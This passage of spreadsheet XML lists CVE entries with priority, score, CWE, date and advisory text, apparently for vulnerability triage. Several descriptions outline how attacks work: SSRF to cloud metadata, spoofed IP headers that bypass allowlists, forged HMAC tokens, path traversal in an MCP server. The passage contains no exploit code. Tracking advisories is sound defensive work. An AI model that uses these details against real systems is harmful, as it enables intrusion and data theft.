          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80117</t>
        </is>
      </c>
    </row>
    <row r="3634">
      <c r="A3634" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3634" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81531</t>
        </is>
      </c>
      <c r="C3634" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3634" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3634" s="5" t="inlineStr"/>
      <c r="F3634" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3634" s="5" t="inlineStr"/>
      <c r="H3634" s="5" t="inlineStr"/>
      <c r="I3634" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3634" s="5" t="inlineStr"/>
      <c r="K3634" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3634" s="5" t="inlineStr">
        <is>
          <t>An information
disclosure vulnerability has been identified in Omada Controller.  An API endpoint intended for Controller initialization
remains accessible after completion and may disclose account-related
information to unauthenticated remote users. 
Successful
exploitation may allow an attacker to remote query the affected endpoint that
may facilitate user enumeration and subsequent attacks targeting administrative
accounts.</t>
        </is>
      </c>
      <c r="M3634" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81531</t>
        </is>
      </c>
    </row>
    <row r="3635">
      <c r="A3635" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3635" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81823</t>
        </is>
      </c>
      <c r="C3635" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3635" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3635" s="5" t="inlineStr"/>
      <c r="F3635" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3635" s="5" t="inlineStr"/>
      <c r="H3635" s="5" t="inlineStr"/>
      <c r="I3635" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J3635" s="5" t="inlineStr"/>
      <c r="K3635" s="5" t="inlineStr">
        <is>
          <t>CWE-862</t>
        </is>
      </c>
      <c r="L3635" s="5" t="inlineStr">
        <is>
          <t>The vulnerability, if exploited, could allow an unauthenticated miscreant to perform read operations intended only for PIMBoards users, resulting in information disclosure. Write operations are not impacted.</t>
        </is>
      </c>
      <c r="M3635" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81823</t>
        </is>
      </c>
    </row>
    <row r="3636">
      <c r="A3636" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3636" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82398</t>
        </is>
      </c>
      <c r="C3636" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3636" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3636" s="5" t="inlineStr"/>
      <c r="F3636" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3636" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3636" s="5" t="inlineStr"/>
      <c r="I3636" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3636" s="5" t="inlineStr"/>
      <c r="K3636" s="5" t="inlineStr">
        <is>
          <t>CWE-407</t>
        </is>
      </c>
      <c r="L3636" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.15.0, an attacker can craft a PDF that causes long runtimes when the pypdf/_utils.py function read_until_whitespace reads a stream containing a long run of bytes without whitespace. The function repeatedly performs immutable bytes concatenation in a one-byte loop, causing quadratic processing cost for the long non-whitespace input. This issue is fixed in version 6.15.0.</t>
        </is>
      </c>
      <c r="M3636" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82398</t>
        </is>
      </c>
    </row>
    <row r="3637">
      <c r="A3637" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3637" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82462</t>
        </is>
      </c>
      <c r="C3637" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3637" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3637" s="5" t="inlineStr"/>
      <c r="F3637" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3637" s="5" t="inlineStr"/>
      <c r="H3637" s="5" t="inlineStr"/>
      <c r="I3637" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J3637" s="5" t="inlineStr"/>
      <c r="K3637" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3637" s="5" t="inlineStr">
        <is>
          <t>pac4j-oidc before 6.5.6 accepts OIDC callbacks carrying only an access token without authorization code or ID token validation. Attackers can substitute access tokens minted for other clients to create authenticated sessions without proper issuer, audience, nonce, or subject verification.</t>
        </is>
      </c>
      <c r="M3637" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82462</t>
        </is>
      </c>
    </row>
    <row r="3638">
      <c r="A3638" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3638" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82465</t>
        </is>
      </c>
      <c r="C3638" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3638" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3638" s="5" t="inlineStr"/>
      <c r="F3638" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3638" s="5" t="inlineStr"/>
      <c r="H3638" s="5" t="inlineStr"/>
      <c r="I3638" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J3638" s="5" t="inlineStr"/>
      <c r="K3638" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="L3638" s="5" t="inlineStr">
        <is>
          <t>pac4j-saml before 6.5.6 does not require signature validation of SAML LogoutRequest messages in SAML2LogoutValidator.validateLogoutRequest(). When an IdP sends no SessionIndex, a session can be destroyed based solely on the NameID, allowing an unauthenticated attacker to submit an unsigned LogoutRequest with a guessed identifier (e.g., an email address used as NameID) to terminate a victim's SAML session.</t>
        </is>
      </c>
      <c r="M3638" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82465</t>
        </is>
      </c>
    </row>
    <row r="3639">
      <c r="A3639" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3639" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82476</t>
        </is>
      </c>
      <c r="C3639" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3639" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3639" s="5" t="inlineStr"/>
      <c r="F3639" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3639" s="5" t="inlineStr"/>
      <c r="H3639" s="5" t="inlineStr"/>
      <c r="I3639" s="5" t="inlineStr">
        <is>
          <t>2026-08-29</t>
        </is>
      </c>
      <c r="J3639" s="5" t="inlineStr"/>
      <c r="K3639" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3639" s="5" t="inlineStr">
        <is>
          <t>Memos through 0.30.0 omits the 100.64.0.0/10 carrier-grade NAT address range from SSRF protection in its link-metadata fetcher, allowing unauthenticated attackers to bypass IP validation. Attackers can make the server request internal hosts in that range including cloud metadata services and read page titles and descriptions back.</t>
        </is>
      </c>
      <c r="M3639" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82476</t>
        </is>
      </c>
    </row>
    <row r="3640">
      <c r="A3640" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3640" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82530</t>
        </is>
      </c>
      <c r="C3640" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3640" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3640" s="5" t="inlineStr"/>
      <c r="F3640" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3640" s="5" t="inlineStr"/>
      <c r="H3640" s="5" t="inlineStr"/>
      <c r="I3640" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3640" s="5" t="inlineStr"/>
      <c r="K3640" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L3640" s="5" t="inlineStr">
        <is>
          <t>IP2Location Country Blocker plugin for WordPress before 2.45.0 contains an access control bypass vulnerability that allows unauthenticated remote attackers to circumvent IP-based restrictions by forging the X-Real-IP HTTP header. Attackers can set the X-Real-IP header to an allowlisted IP address to bypass page, link, or site-wide access restrictions and access otherwise-blocked resources.</t>
        </is>
      </c>
      <c r="M3640" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82530</t>
        </is>
      </c>
    </row>
    <row r="3641">
      <c r="A3641" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3641" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82853</t>
        </is>
      </c>
      <c r="C3641" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3641" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3641" s="5" t="inlineStr"/>
      <c r="F3641" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G3641" s="5" t="inlineStr"/>
      <c r="H3641" s="5" t="inlineStr"/>
      <c r="I3641" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3641" s="5" t="inlineStr"/>
      <c r="K3641" s="5" t="inlineStr">
        <is>
          <t>CWE-93</t>
        </is>
      </c>
      <c r="L3641" s="5" t="inlineStr">
        <is>
          <t>Nodemailer versions before 8.0.5 contain an SMTP command injection vulnerability in the transport name option used in EHLO/HELO commands. The name parameter is concatenated directly into SMTP commands without sanitizing carriage return and line feed characters, allowing attackers to inject arbitrary SMTP commands for email spoofing and phishing attacks.</t>
        </is>
      </c>
      <c r="M3641" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82853</t>
        </is>
      </c>
    </row>
    <row r="3642">
      <c r="A3642" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3642" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83492</t>
        </is>
      </c>
      <c r="C3642" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3642" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3642" s="5" t="inlineStr"/>
      <c r="F3642" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3642" s="5" t="inlineStr"/>
      <c r="H3642" s="5" t="inlineStr"/>
      <c r="I3642" s="5" t="inlineStr">
        <is>
          <t>2026-08-31</t>
        </is>
      </c>
      <c r="J3642" s="5" t="inlineStr"/>
      <c r="K3642" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="L3642" s="5" t="inlineStr">
        <is>
          <t>Improper input validation vulnerability in Extend Themes Kubio AI Website Builder.
This issue affects Kubio AI Website Builder: before 2.9.1.</t>
        </is>
      </c>
      <c r="M3642" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83492</t>
        </is>
      </c>
    </row>
    <row r="3643">
      <c r="A3643" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3643" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83530</t>
        </is>
      </c>
      <c r="C3643" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3643" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3643" s="5" t="inlineStr"/>
      <c r="F3643" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3643" s="5" t="inlineStr"/>
      <c r="H3643" s="5" t="inlineStr"/>
      <c r="I3643" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J3643" s="5" t="inlineStr"/>
      <c r="K3643" s="5" t="inlineStr">
        <is>
          <t>CWE-789</t>
        </is>
      </c>
      <c r="L3643" s="5" t="inlineStr">
        <is>
          <t>A user could provide an expression whose string length is longer than the ParserExpressionSizeLimit() configured on the CEL environment, and a memory allocation would occur proportional to the size of the input before the limit would be checked / enforced.</t>
        </is>
      </c>
      <c r="M3643" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83530</t>
        </is>
      </c>
    </row>
    <row r="3644">
      <c r="A3644" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3644" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83611</t>
        </is>
      </c>
      <c r="C3644" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3644" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3644" s="5" t="inlineStr"/>
      <c r="F3644" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3644" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H3644" s="5" t="inlineStr"/>
      <c r="I3644" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3644" s="5" t="inlineStr"/>
      <c r="K3644" s="5" t="inlineStr">
        <is>
          <t>CWE-1286</t>
        </is>
      </c>
      <c r="L3644" s="5" t="inlineStr">
        <is>
          <t>xmldom is a pure JavaScript W3C standard-based (XML DOM Level 2 Core) DOMParser and XMLSerializer module. Prior to @xmldom/xmldom versions 0.8.15 and 0.9.12, and in xmldom version 0.6.0 and earlier, DOMParser.parseFromString() can silently accept an end tag such as &lt;/a\njunk&gt;, close the element, and discard the trailing content. On 0.9.x, the lib/sax.js end-tag validator inherits the multiline flag from reg(), allowing the first line to satisfy the anchored XML ETag production; older lines have no equivalent residue validation. This parser differential can bypass a parse-before-trust well-formedness gate, although it does not inject the discarded content; onError on 0.9.x and errorHandler on 0.8.x are the relevant reporting interfaces. This issue is fixed in @xmldom/xmldom versions 0.8.15 and 0.9.12; no fixed version is available for xmldom.</t>
        </is>
      </c>
      <c r="M3644" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83611</t>
        </is>
      </c>
    </row>
    <row r="3645">
      <c r="A3645" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3645" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84186</t>
        </is>
      </c>
      <c r="C3645" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3645" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3645" s="5" t="inlineStr"/>
      <c r="F3645" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3645" s="5" t="inlineStr"/>
      <c r="H3645" s="5" t="inlineStr"/>
      <c r="I3645" s="5" t="inlineStr">
        <is>
          <t>2026-09-07</t>
        </is>
      </c>
      <c r="J3645" s="5" t="inlineStr"/>
      <c r="K3645" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L3645" s="5" t="inlineStr">
        <is>
          <t>Vulnerability involving incorrect access control in the Tools::getRemoteAddr() function in PrestaShop, which allows the client’s IP address to be spoofed via the X-Forwarded-For header when the application is running behind a reverse proxy, load balancer or CDN. The application incorrectly processes the IP address string and uses the address controlled by the visitor rather than the one provided by the trusted infrastructure, allowing an unauthenticated remote attacker to cause the application to interpret their connection as originating from an arbitrary IP address. This condition allows IP-based controls, such as the maintenance mode allowlist, to be bypassed, as well as enabling the forgery of security and audit logs and the evasion of third-party mechanisms that rely on the IP address, such as geolocation checks, fraud detection or request throttling.</t>
        </is>
      </c>
      <c r="M3645" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84186</t>
        </is>
      </c>
    </row>
    <row r="3646">
      <c r="A3646" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3646" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84199</t>
        </is>
      </c>
      <c r="C3646" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3646" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3646" s="5" t="inlineStr"/>
      <c r="F3646" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3646" s="5" t="inlineStr"/>
      <c r="H3646" s="5" t="inlineStr"/>
      <c r="I3646" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3646" s="5" t="inlineStr"/>
      <c r="K3646" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3646" s="5" t="inlineStr">
        <is>
          <t>Kyverno before 1.16.2 contains a server-side request forgery (SSRF) vulnerability in the APICall feature. The URL field in a Policy's ServiceCall configuration is not validated, so a user with namespace-level Policy creation permissions can direct Kyverno to make HTTP requests to arbitrary internal resources (e.g., cloud metadata endpoints such as 169.254.169.254 or other tenants' resources). Because Kyverno executes these requests using its cluster-wide high-privilege ServiceAccount (a Confused Deputy problem), the responses—potentially including other tenants' secrets and cloud IAM credentials—are returned in the PolicyReport and can be read by the attacker, breaking multi-tenant isolation.</t>
        </is>
      </c>
      <c r="M3646" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84199</t>
        </is>
      </c>
    </row>
    <row r="3647">
      <c r="A3647" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3647" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84201</t>
        </is>
      </c>
      <c r="C3647" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3647" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3647" s="5" t="inlineStr"/>
      <c r="F3647" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3647" s="5" t="inlineStr"/>
      <c r="H3647" s="5" t="inlineStr"/>
      <c r="I3647" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3647" s="5" t="inlineStr"/>
      <c r="K3647" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L3647" s="5" t="inlineStr">
        <is>
          <t>appium-mcp-server through 0.1.61 fails to validate or normalize file paths in the write_file and write_files_batch tools, allowing attackers to write files outside the intended PROJECT_ROOT directory. Attackers can supply absolute paths or relative paths with parent directory segments to overwrite arbitrary files with the server user's privileges, including shell profiles and configuration files in the home directory.</t>
        </is>
      </c>
      <c r="M3647" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84201</t>
        </is>
      </c>
    </row>
    <row r="3648">
      <c r="A3648" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3648" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84309</t>
        </is>
      </c>
      <c r="C3648" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3648" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3648" s="5" t="inlineStr"/>
      <c r="F3648" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G3648" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H3648" s="5" t="inlineStr"/>
      <c r="I3648" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3648" s="5" t="inlineStr"/>
      <c r="K3648" s="5" t="inlineStr">
        <is>
          <t>CWE-835</t>
        </is>
      </c>
      <c r="L3648" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.0, an attacker can craft a PDF whose cyclic tree structure causes pypdf/generic/_data_structures.py TreeObject.insert_child to follow /Next links indefinitely when a writing code path inserts a child, producing an infinite loop. This issue is fixed in version 6.16.0.</t>
        </is>
      </c>
      <c r="M3648" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84309</t>
        </is>
      </c>
    </row>
    <row r="3649">
      <c r="A3649" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3649" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84478</t>
        </is>
      </c>
      <c r="C3649" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3649" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3649" s="5" t="inlineStr"/>
      <c r="F3649" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G3649" s="5" t="inlineStr"/>
      <c r="H3649" s="5" t="inlineStr"/>
      <c r="I3649" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3649" s="5" t="inlineStr"/>
      <c r="K3649" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="L3649" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo contains a path traversal vulnerability in the API get_api_login_code endpoint that allows unauthenticated attackers to delete arbitrary .log files by supplying directory traversal sequences in the code parameter. Attackers can exploit this to destroy audit logs and probe for file existence on the server, with the vulnerability enabling both file deletion and information disclosure about the filesystem.</t>
        </is>
      </c>
      <c r="M3649" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84478</t>
        </is>
      </c>
    </row>
    <row r="3650">
      <c r="A3650" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3650" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84481</t>
        </is>
      </c>
      <c r="C3650" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3650" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3650" s="5" t="inlineStr"/>
      <c r="F3650" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3650" s="5" t="inlineStr"/>
      <c r="H3650" s="5" t="inlineStr"/>
      <c r="I3650" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3650" s="5" t="inlineStr"/>
      <c r="K3650" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="L3650" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through 30.0 contains an information disclosure vulnerability in the MobileManager plugin getConfiguration endpoint that returns sensitive configuration data to unauthenticated visitors. Attackers can send an unauthenticated GET request to plugin/MobileManager/getConfiguration.json.php to obtain TLS private key file paths, socket configuration details, platform version, and debug flags enabling further targeted attacks.</t>
        </is>
      </c>
      <c r="M3650" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84481</t>
        </is>
      </c>
    </row>
    <row r="3651">
      <c r="A3651" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3651" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84483</t>
        </is>
      </c>
      <c r="C3651" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3651" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3651" s="5" t="inlineStr"/>
      <c r="F3651" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G3651" s="5" t="inlineStr"/>
      <c r="H3651" s="5" t="inlineStr"/>
      <c r="I3651" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="J3651" s="5" t="inlineStr"/>
      <c r="K3651" s="5" t="inlineStr">
        <is>
          <t>CWE-321</t>
        </is>
      </c>
      <c r="L3651" s="5" t="inlineStr">
        <is>
          <t>WWBN AVideo through commit 9c39d8c8 contains an incomplete authentication bypass in encryptPass.json.php that allows unauthenticated attackers to compute valid HMAC tokens using the public site URL and current time. Attackers can forge authentication tokens by computing hash_hmac with the site's base URL as the key and submit arbitrary passwords to receive encrypted hashes, enabling offline precomputation attacks against stolen password databases.</t>
        </is>
      </c>
      <c r="M3651" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84483</t>
        </is>
      </c>
    </row>
    <row r="3652">
      <c r="A3652" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3652" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84697</t>
        </is>
      </c>
      <c r="C3652" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3652" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3652" s="5" t="inlineStr"/>
      <c r="F3652" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3652" s="5" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="H3652" s="5" t="inlineStr"/>
      <c r="I3652" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="J3652" s="5" t="inlineStr"/>
      <c r="K3652" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="L3652" s="5" t="inlineStr">
        <is>
          <t>Mailpit's IsInternalIP deny list function fails to block the Azure WireServer address 168.63.129.16 and the RFC 2765/6145 IPv4-translated IPv6 prefix, allowing server-side request forgery to internal destinations. Attackers can supply hostnames resolving to these addresses in message content to reach the link check API and proxy endpoint for accessing internal resources.</t>
        </is>
      </c>
      <c r="M3652" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84697</t>
        </is>
      </c>
    </row>
    <row r="3653">
      <c r="A3653" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3653" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84941</t>
        </is>
      </c>
      <c r="C3653" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3653" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3653" s="5" t="inlineStr"/>
      <c r="F3653" s="5" t="inlineStr"/>
      <c r="G3653" s="5" t="inlineStr"/>
      <c r="H3653" s="5" t="inlineStr"/>
      <c r="I3653" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J3653" s="5" t="inlineStr"/>
      <c r="K3653" s="5" t="inlineStr">
        <is>
          <t>CWE-611</t>
        </is>
      </c>
      <c r="L3653" s="5" t="inlineStr">
        <is>
          <t>An information disclosure vulnerability in the SAML Single Sign-On (SSO) functionality of Omada Controller allows an authenticated user with SAML configuration privileges to access sensitive information due to insufficient validation of user-supplied SAML metadata. Successful exploitation could result in unauthorized disclosure of sensitive information.</t>
        </is>
      </c>
      <c r="M3653" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84941</t>
        </is>
      </c>
    </row>
    <row r="3654">
      <c r="A3654" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3654" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84968</t>
        </is>
      </c>
      <c r="C3654" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="D3654" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E3654" s="5" t="inlineStr"/>
      <c r="F3654" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G3654" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H3654" s="5" t="inlineStr">
        <is>
          <t>mongodb:php_driver</t>
        </is>
      </c>
      <c r="I3654" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J3654" s="5" t="inlineStr"/>
      <c r="K3654" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L3654" s="5" t="inlineStr">
        <is>
          <t>An out-of-bounds read in the BSON decoding component of the MongoDB PHP driver may allow an unauthenticated party who supplies specially formed input to have a small amount of adjacent process memory copied into an error message that is returned to application code. This may result in unintended disclosure of limited memory contents.</t>
        </is>
      </c>
      <c r="M3654" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84968</t>
        </is>
      </c>
    </row>
    <row r="3655">
      <c r="A3655" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B3655" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85062</t>
